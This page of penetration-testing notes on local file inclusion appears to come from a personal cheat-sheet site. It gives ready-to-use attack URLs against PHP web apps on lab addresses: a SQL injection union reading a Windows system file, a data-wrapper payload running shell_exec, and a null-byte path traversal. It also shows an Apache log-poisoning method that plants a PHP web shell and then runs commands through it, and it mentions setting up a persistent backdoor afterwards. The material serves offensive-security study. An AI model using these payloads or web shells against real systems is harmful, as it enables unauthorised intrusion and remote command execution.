LFI

Basic RCE Example:

If you have SQLi or can modify templates, see if you can read a system file. If this works you can try for rce. (in this case its windows with apache):

http://192.168.11.35/comment.php?id=-1 union select all 1,2,3,4,load_file('c:/windows/system32/drivers/etc/host'),6

PHP WRAPPERS:

Example 1:

http://10.11.0.22/menu.php?file=data:text/plain,hello world

The menu page is vulnerable to LFI attacks. If we submit a payload using a data wrapper, the application should treat it the text the same as a regular file and include it in the page. http://10.11.0.22/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>

Often encodings are combined with this method. Below are a couple sources to get you started. https://github.com/cyberheartmi9/PayloadsAllTheThings/blob/master/File%20Inclusion%20-%20Path%20Traversal/README.md

https://www.aptive.co.uk/blog/local-file-inclusion-lfi-testing/

EXAMPLE:

Found this code on the site:

include: Used to load files, (php files in this case) from the server locally and run them. In this case we can submit something other than en,fr,etc and have the server request other files. We test a common windows file to make sure our traversal works.

A null byte %00 is used to stop the code from trying to append the php extension via the include statement.

Log File Poison RCE:

One way to get RCE with LFI is by poisoning a log file with php then displaying the file in the browser so the php is executed. We can do this by making a bad request with nc that contains our code and then read back the log with apache php.

Try other php shells if this does not work. It may also need the use of a pre tag to keep spacing. ex: <?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>

This causes our request to get logged at : c:\xampp\apache\logs\access.log

Match your log file type/path to the server you are attacking.

Running the RCE:

http://10.11.1.35/addguestbook.php?cmd=ipconfig&LANG=../../../../../../../xampp/apache/logs/access.log%00

Commands will be executed with the apache privs. From here a more persistent shell/backdoor can be established.

PreviousDir Traversal FuzzerNextRFI

Last updated